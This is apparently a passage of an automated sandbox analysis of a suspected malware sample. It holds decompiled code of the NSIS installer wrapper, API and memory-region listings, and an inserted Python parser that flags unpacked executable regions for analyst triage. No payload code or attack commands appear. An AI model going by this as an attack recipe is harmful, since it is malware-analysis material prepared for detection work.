                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 123533781-47812868
                                                                        • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                        • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                                                        • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                        • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 39%
                                                                        			// FindFirstFileA wrapper. _t19 is the decompiler's frame pointer: _t19 - 0x1a4 is a
                                                                        			// WIN32_FIND_DATAA on the stack and _t19 - 0x178 is its cFileName member (offset 0x2c).
                                                                        			// __edi and __esi are two output buffers; __ebx is the byte stored in them on failure.
                                                                        			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
                                                                        				void* _t19;

                                                                        				// E00402A9A(2) yields the search pattern; 0xffffffff is INVALID_HANDLE_VALUE
                                                                        				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                        					E0040591D(__edi, _t6);    // _t6 is left undeclared by the decompiler; most likely the returned search handle
                                                                        					_push(_t19 - 0x178);
                                                                        					_push(__esi);
                                                                        					E004059BF();              // copy the found cFileName into __esi
                                                                        				} else {
                                                                        					 *((char*)(__edi)) = __ebx;        // no match: empty both output buffers
                                                                        					 *__esi = __ebx;
                                                                        					 *((intOrPtr*)(_t19 - 4)) = 1;     // and set the local flag that is added to *0x7a3008 below
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        Instruction addresses: 0x004026d4, 0x004026e8, 0x004026f3, 0x004026f4, 0x00402855, 0x004026d6, 0x004026d8, 0x004026da, 0x00402932, 0x0040293e


                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                        • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                                                        • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                        • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                        • Instruction ID: 3b8a23052aa74c215c4f1671029b27e158a1291e860f2c40aff43fb71103cab5
                                                                        • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                        • Instruction Fuzzy Hash: 75010C78E15208EFDB41DF98C5849ADBBF5FB09620F2585EAE818E7711D330AE509B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
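The per-function entries above carry the data an analyst pivots on between reports: the API list with call-site addresses, the Strings with their xrefs, the Memory Dump Source name, and the Similarity hashes. The entries from the 026C0000 dump are notable because that region is "based on PE: false", i.e. code that no image on disk accounts for. The following Python parser is an added example and not part of this report or of the sandbox's own tooling. It reads the listing layout exactly as it appears on this page into records, indexes functions by Instruction Fuzzy Hash for cross-report matching, lists which functions call a given API, and flags dump regions that are executable-and-writable with no PE behind them. Two things are assumptions: the sample input is a constructed excerpt of this page's own entries (argument lists shortened), and the fifth dotted field of the .sdmp name is read as a Win32 PAGE_* protection value because the page's regions fit that reading; the format is not documented here.

```python
import re
from dataclasses import dataclass, field

# Constructed input: three entries copied from this page in its own layout (API argument lists
# shortened; the first entry's decompiled signature lies above the excerpt, so it parses as unnamed).
SAMPLE_LISTING = r"""
APIs
• CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000), ref: 004020F9
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400), ref: 004021B5
Strings
• C:\Users\user\AppData\Local\Temp, xrefs: 00402131
Memory Dump Source
• Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 123533781-47812868
• Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
Uniqueness Score: -1.00%
C-Code - Quality: 39%
E004026BC(char __ebx, CHAR* __edi, char* __esi) {
    if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) { E0040591D(__edi, _t6); }
}
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
Memory Dump Source
• Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 1974802433-0
• Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
Similarity
• Instruction Fuzzy Hash: 75010C78E15208EFDB41DF98C5849ADBBF5FB09620F2585EAE818E7711D330AE509B40
Uniqueness Score: -1.00%
"""

@dataclass
class DumpSource:
    base: int        # 4th dotted field of the .sdmp name: region base address
    protection: int  # 5th dotted field; ASSUMED to be a Win32 PAGE_* value (this page's
                     # regions fit: .text 0x20, PE header 0x02, data 0x04, unbacked blob 0x40)
    pe_backed: bool  # "based on PE: true/false"

    def looks_unpacked(self) -> bool:
        # PAGE_EXECUTE_READWRITE memory with no PE image behind it: where unpacked payloads live.
        return self.protection == 0x40 and not self.pe_backed

@dataclass
class FunctionRecord:
    name: str = ""                                # decompiled signature name, "" if not shown
    apis: list = field(default_factory=list)      # (api, module, call-site address)
    strings: list = field(default_factory=list)   # (text, xref address)
    source: DumpSource = None
    instruction_fuzzy_hash: str = ""

FUNC_RE = re.compile(r"^(E[0-9A-F]{8})\(")
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})")
STRING_RE = re.compile(r"^•\s*(.+?),\s*xrefs:\s*([0-9A-Fa-f]{8})")
SOURCE_RE = re.compile(r"Source File:\s*(\S+?)\.sdmp,.*based on PE:\s*(true|false)")
HASH_RE = re.compile(r"^•\s*Instruction Fuzzy Hash:\s*(\S+)")
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness")

def parse_listing(text: str) -> list:
    records, cur, section = [], FunctionRecord(), None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if line in SECTIONS:
            section = line
        elif line.startswith("Uniqueness Score"):          # closes one function entry
            records.append(cur)
            cur, section = FunctionRecord(), None
        elif not cur.name and (m := FUNC_RE.match(line)):
            cur.name = m.group(1)
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append((m.group(1), m.group(2), m.group(4)))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m.group(1), m.group(2)))
        elif section == "Memory Dump Source" and (m := SOURCE_RE.search(line)):
            f = m.group(1).split(".")   # proc idx, stage, dump id, base, protection, flags
            cur.source = DumpSource(int(f[3], 16), int(f[4], 16), m.group(2) == "true")
        elif section == "Similarity" and (m := HASH_RE.match(line)):
            cur.instruction_fuzzy_hash = m.group(1)
    return records

def functions_calling(records: list, api: str) -> list:
    return [r.name for r in records if any(a[0] == api for a in r.apis)]

def fuzzy_hash_index(records: list) -> dict:
    # Pivot key: the same Instruction Fuzzy Hash in another report marks the same function body.
    idx = {}
    for r in records:
        if r.instruction_fuzzy_hash:
            idx.setdefault(r.instruction_fuzzy_hash, []).append(r.name or f"unnamed@{r.source.base:08x}")
    return idx

def unpacked_regions(records: list) -> list:
    return sorted({r.source.base for r in records if r.source and r.source.looks_unpacked()})
```

Run over a whole report, `unpacked_regions` returns the bases whose functions deserve attention first (here only 0x026C0000), and `fuzzy_hash_index` gives the keys to look up in other reports of the same family; the hash values are taken verbatim from the listing, so matches are exact-string matches, not a similarity score.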

                                                                        C-Code - Quality: 77%
                                                                        			// Outer dialog procedure of the installer wrapper, not the injected payload. The layout
                                                                        			// (page records 0x40 bytes apart indexed through 0x409284, control ids 1/2/3 for
                                                                        			// Next/Cancel/Back, the current page dialog at 0x7a2758 placed over control 0x3fa,
                                                                        			// WM_USER+8 as the page-advance message) closely matches the NSIS stub's DialogProc.
                                                                        			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                        				void* _v84;
                                                                        				void* _v88;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t33;
                                                                        				signed int _t35;
                                                                        				struct HWND__* _t37;
                                                                        				struct HWND__* _t47;
                                                                        				struct HWND__* _t65;
                                                                        				struct HWND__* _t71;
                                                                        				struct HWND__* _t84;
                                                                        				struct HWND__* _t89;
                                                                        				struct HWND__* _t97;
                                                                        				int _t101;
                                                                        				int _t104;
                                                                        				struct HWND__* _t117;
                                                                        				struct HWND__* _t120;
                                                                        				signed int _t122;
                                                                        				struct HWND__* _t127;
                                                                        				long _t132;
                                                                        				int _t134;
                                                                        				int _t135;
                                                                        				struct HWND__* _t136;
                                                                        				void* _t139;
                                                                        
                                                                        				_t135 = _a8;
                                                                        				if(_t135 == 0x110 || _t135 == 0x408) {    // WM_INITDIALOG, or WM_USER+8: the installer's own "advance to next page" message
                                                                        					_t33 = _a12;
                                                                        					_t117 = _a4;
                                                                        					__eflags = _t135 - 0x110;
                                                                        					 *0x79f56c = _t33;
                                                                        					if(_t135 == 0x110) {
                                                                        						 *0x7a2f84 = _t117;
                                                                        						 *0x79f57c = GetDlgItem(_t117, 1);    // IDOK: the Next button
                                                                        						_t89 = GetDlgItem(_t117, 2);          // IDCANCEL
                                                                        						_push(0xffffffff);
                                                                        						_push(0x1c);
                                                                        						 *0x79e548 = _t89;
                                                                        						E00403DA7(_t117);
                                                                        						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);    // GCL_HICON (-14): set the dialog class icon
                                                                        						 *0x7a274c = E00401410(4);
                                                                        						_t33 = 1;
                                                                        						__eflags = 1;
                                                                        						 *0x79f56c = 1;
                                                                        					}
                                                                        					_t120 =  *0x409284; // 0xffffffff: current page index, -1 before the first page
                                                                        					_t132 = (_t120 << 6) +  *0x7a2fa0;    // page record = table base + index * 0x40
                                                                        					__eflags = _t120;
                                                                        					if(_t120 < 0) {
                                                                        						L38:
                                                                        						E00403DF3(0x40b);
                                                                        						while(1) {
                                                                        							_t35 =  *0x79f56c;
                                                                        							 *0x409284 =  *0x409284 + _t35;
                                                                        							_t132 = _t132 + (_t35 << 6);
                                                                        							_t37 =  *0x409284; // 0xffffffff
                                                                        							__eflags = _t37 -  *0x7a2fa4;
                                                                        							if(_t37 ==  *0x7a2fa4) {
                                                                        								E00401410(1);
                                                                        							}
                                                                        							__eflags =  *0x7a274c;
                                                                        							if( *0x7a274c != 0) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
                                                                        							if(__eflags >= 0) {
                                                                        								break;
                                                                        							}
                                                                        							_push( *((intOrPtr*)(_t132 + 0x24)));
                                                                        							_t122 =  *(_t132 + 0x14);
                                                                        							_push(0x7ab000);
                                                                        							E004059E1(_t117, _t122, _t132);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                                        							_push(0xfffffc19);
                                                                        							E00403DA7(_t117);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                                        							_push(0xfffffc1b);
                                                                        							E00403DA7(_t117);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                                        							_push(0xfffffc1a);
                                                                        							E00403DA7(_t117);
                                                                        							_t47 = GetDlgItem(_t117, 3);
                                                                        							__eflags =  *0x7a300c;
                                                                        							_t136 = _t47;
                                                                        							if( *0x7a300c != 0) {
                                                                        								_t122 = _t122 & 0x0000fefd | 0x00000004;
                                                                        								__eflags = _t122;
                                                                        							}
                                                                        							ShowWindow(_t136, _t122 & 0x00000008);          // page flags: bit 3 shows the Back button (control 3)
                                                                        							EnableWindow(_t136, _t122 & 0x00000100);        // bit 8 enables Back
                                                                        							E00403DC9(_t122 & 0x00000002);                  // bit 1 passed on to E00403DC9 (most likely enables Next)
                                                                        							EnableWindow( *0x79e548, _t122 & 0x00000004);   // bit 2 enables Cancel
                                                                        							SendMessageA(_t136, 0xf4, 0, 1);                // BM_SETSTYLE: BS_PUSHBUTTON, redraw
                                                                        							__eflags =  *0x7a300c;
                                                                        							if( *0x7a300c == 0) {
                                                                        								_push( *0x79f57c);
                                                                        							} else {
                                                                        								SendMessageA(_t117, 0x401, 2, 0);    // DM_SETDEFID: make Cancel (IDCANCEL) the default button while *0x7a300c is set
                                                                        								_push( *0x79e548);
                                                                        							}
                                                                        							E00403DDC();
                                                                        							E004059BF(0x79f580, 0x7a2780);
                                                                        							_push( *((intOrPtr*)(_t132 + 0x18)));
                                                                        							_push( &(0x79f580[lstrlenA(0x79f580)]));
                                                                        							E004059E1(_t117, 0, _t132);
                                                                        							SetWindowTextA(_t117, 0x79f580);
                                                                        							_push(0);
                                                                        							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
                                                                        							__eflags = _t65;
                                                                        							if(_t65 != 0) {
                                                                        								continue;
                                                                        							} else {
                                                                        								__eflags =  *_t132 - _t65;
                                                                        								if( *_t132 == _t65) {
                                                                        									continue;
                                                                        								}
                                                                        								__eflags =  *(_t132 + 4) - 5;
                                                                        								if( *(_t132 + 4) != 5) {
                                                                        									DestroyWindow( *0x7a2758);
                                                                        									 *0x79ed58 = _t132;
                                                                        									__eflags =  *_t132;
                                                                        									if( *_t132 > 0) {
                                                                        										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);    // page dialog: resource id from the page record, dialog proc from the table at 0x409288 indexed by the page kind at +4
                                                                        										__eflags = _t71;
                                                                        										 *0x7a2758 = _t71;
                                                                        										if(_t71 != 0) {
                                                                        											_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                                        											_push(6);
                                                                        											E00403DA7(_t71);
                                                                        											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);    // control 0x3fa is the placeholder rectangle the page dialog is placed over
                                                                        											ScreenToClient(_t117, _t139 + 0x10);
                                                                        											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);    // SWP_NOSIZE | SWP_NOZORDER | SWP_NOACTIVATE
                                                                        											_push(0);
                                                                        											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
                                                                        											ShowWindow( *0x7a2758, 8);    // SW_SHOWNA
                                                                        											E00403DF3(0x405);
                                                                        										}
                                                                        									}
                                                                        									goto L58;
                                                                        								}
                                                                        								__eflags =  *0x7a300c - _t65;
                                                                        								if( *0x7a300c != _t65) {
                                                                        									goto L61;
                                                                        								}
                                                                        								__eflags =  *0x7a3000 - _t65;
                                                                        								if( *0x7a3000 != _t65) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L61;
                                                                        							}
                                                                        						}
                                                                        						DestroyWindow( *0x7a2758);
                                                                        						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
                                                                        						__eflags =  *0x7a2f84;
                                                                        						EndDialog(_t117,  *0x79e950);    // last page done or run aborted: close the outer dialog
                                                                        						goto L58;
                                                                        					} else {
                                                                        						__eflags = _t33 - 1;
                                                                        						if(_t33 != 1) {
                                                                        							L37:
                                                                        							__eflags =  *_t132;
                                                                        							if( *_t132 == 0) {
                                                                        								goto L61;
                                                                        							}
                                                                        							goto L38;
                                                                        						}
                                                                        						_push(0);
                                                                        						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
                                                                        						__eflags = _t84;
                                                                        						if(_t84 == 0) {
                                                                        							goto L37;
                                                                        						}
                                                                        						SendMessageA( *0x7a2758, 0x40f, 0, 1);    // WM_USER+0xf, sent to the current page dialog
                                                                        						__eflags =  *0x7a274c;
                                                                        						return 0 |  *0x7a274c == 0x00000000;
                                                                        					}
                                                                        				} else {
                                                                        					_t117 = _a4;
                                                                        					if(_t135 == 0x47) {    // WM_WINDOWPOSCHANGED
                                                                        						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);    // keep the window at *0x79f560 just behind this dialog in z-order: SWP_NOSIZE | SWP_NOMOVE | SWP_NOACTIVATE
                                                                        					}
                                                                        					if(_t135 == 5) {    // WM_SIZE
                                                                        						asm("sbb eax, eax");
                                                                        						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);    // hide or show the window at *0x79f560 depending on wParam (SIZE_MINIMIZED = 1); the message id 5 doubles as SW_SHOW
                                                                        					}
                                                                        					if(_t135 != 0x40d) {    // WM_USER+0xd
                                                                        						__eflags = _t135 - 0x11;
                                                                        						if(_t135 != 0x11) {    // WM_QUERYENDSESSION
                                                                        							__eflags = _t135 - 0x10;
                                                                        							if(_t135 != 0x10) {
                                                                        								L14:
                                                                        								__eflags = _t135 - 0x111;
                                                                        								if(_t135 != 0x111) {
                                                                        									L30:
                                                                        									return E00403E0E(_t135, _a12, _a16);
                                                                        								}
                                                                        								_t134 = _a12 & 0x0000ffff;
                                                                        								_t127 = GetDlgItem(_t117, _t134);
                                                                        								__eflags = _t127;
                                                                        								if(_t127 == 0) {
                                                                        									L17:
                                                                        									__eflags = _t134 - 1;
                                                                        									if(_t134 != 1) {
                                                                        										__eflags = _t134 - 3;
                                                                        										if(_t134 != 3) {
                                                                        											__eflags = _t134 - 2;
                                                                        											if(_t134 != 2) {
                                                                        												L29:
                                                                        												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
                                                                        												goto L30;
                                                                        											}
                                                                        											__eflags =  *0x7a300c;
                                                                        											if( *0x7a300c == 0) {
                                                                        												_t97 = E00401410(3);
                                                                        												__eflags = _t97;
                                                                        												if(_t97 != 0) {
                                                                        													goto L30;
                                                                        												}
                                                                        												 *0x79e950 = 1;
                                                                        												L25:
                                                                        												_push(0x78);
                                                                        												L26:
                                                                        												E00403D80();
                                                                        												goto L30;
                                                                        											}
                                                                        											E00401410(_t134);
                                                                        											 *0x79e950 = _t134;
                                                                        											goto L25;
                                                                        										}
                                                                        										__eflags =  *0x409284;
                                                                        										if( *0x409284 <= 0) {
                                                                        											goto L29;
                                                                        										}
                                                                        										_push(0xffffffff);
                                                                        										goto L26;
                                                                        									}
                                                                        									_push(1);
                                                                        									goto L26;
                                                                        								}
                                                                        								SendMessageA(_t127, 0xf3, 0, 0);
                                                                        								_t101 = IsWindowEnabled(_t127);
                                                                        								__eflags = _t101;
                                                                        								if(_t101 == 0) {
                                                                        									goto L61;
                                                                        								}
                                                                        								goto L17;
                                                                        							}
                                                                        							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
                                                                        							if(__eflags != 0) {
                                                                        								goto L30;
                                                                        							}
                                                                        							_t104 = IsWindowEnabled( *0x79e548);
                                                                        							__eflags = _t104;
                                                                        							if(_t104 != 0) {
                                                                        								goto L30;
                                                                        							}
                                                                        							_t135 = 0x111;
                                                                        							_a12 = 1;
                                                                        							goto L14;
                                                                        						}
                                                                        						SetWindowLongA(_t117, 0, 0);
                                                                        						return 1;
                                                                        					} else {
                                                                        						DestroyWindow( *0x7a2758);
                                                                        						 *0x7a2758 = _a12;
                                                                        						L58:
                                                                        						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
                                                                        							ShowWindow(_t117, 0xa);
                                                                        							 *0x7a0580 = 1;
                                                                        						}
                                                                        						L61:
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                        • ShowWindow.USER32(?), ref: 00403918
                                                                        • DestroyWindow.USER32 ref: 0040392C
                                                                        • SetWindowLongA.USER32 ref: 0040394A
                                                                        • IsWindowEnabled.USER32 ref: 00403975
                                                                        • GetDlgItem.USER32 ref: 004039A3
                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                        • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                        • GetDlgItem.USER32 ref: 00403A6A
                                                                        • GetDlgItem.USER32 ref: 00403A74
                                                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                        • GetDlgItem.USER32 ref: 00403B86
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                        • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                        • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                        • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                        • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                        • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3950083612-0
                                                                        • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                        • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                        • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                        • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                        				char* _v8;
                                                                        				signed int _v12;
                                                                        				void* _v16;
                                                                        				struct HWND__* _t52;
                                                                        				long _t86;
                                                                        				int _t98;
                                                                        				struct HWND__* _t99;
                                                                        				signed int _t100;
                                                                        				intOrPtr _t109;
                                                                        				int _t110;
                                                                        				signed int* _t112;
                                                                        				signed int _t113;
                                                                        				char* _t114;
                                                                        				CHAR* _t115;
                                                                        
                                                                        				if(_a8 != 0x110) {
                                                                        					if(_a8 != 0x111) {
                                                                        						L11:
                                                                        						if(_a8 != 0x4e) {
                                                                        							if(_a8 == 0x40b) {
                                                                        								 *0x79f568 =  *0x79f568 + 1;
                                                                        							}
                                                                        							L25:
                                                                        							_t110 = _a16;
                                                                        							L26:
                                                                        							return E00403E0E(_a8, _a12, _t110);
                                                                        						}
                                                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                        						_t110 = _a16;
                                                                        						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                        							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                        							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                        							_v12 = _t100;
                                                                        							_v16 = _t109;
                                                                        							_v8 = 0x7a1f20;
                                                                        							if(_t100 - _t109 < 0x800) {
                                                                        								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                        								SetCursor(LoadCursorA(0, 0x7f02));
                                                                        								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                        								SetCursor(LoadCursorA(0, 0x7f00));
                                                                        								_t110 = _a16;
                                                                        							}
                                                                        						}
                                                                        						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                        							goto L26;
                                                                        						} else {
                                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                        								SendMessageA( *0x7a2f84, 0x111, 1, 0);
                                                                        							}
                                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                        								SendMessageA( *0x7a2f84, 0x10, 0, 0);
                                                                        							}
                                                                        							return 1;
                                                                        						}
                                                                        					}
                                                                        					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
                                                                        						goto L25;
                                                                        					} else {
                                                                        						_t112 =  *0x79ed58 + 0x14;
                                                                        						if(( *_t112 & 0x00000020) == 0) {
                                                                        							goto L25;
                                                                        						}
                                                                        						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                        						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                        						E0040417A();
                                                                        						goto L11;
                                                                        					}
                                                                        				}
                                                                        				_t98 = _a16;
                                                                        				_t113 =  *(_t98 + 0x30);
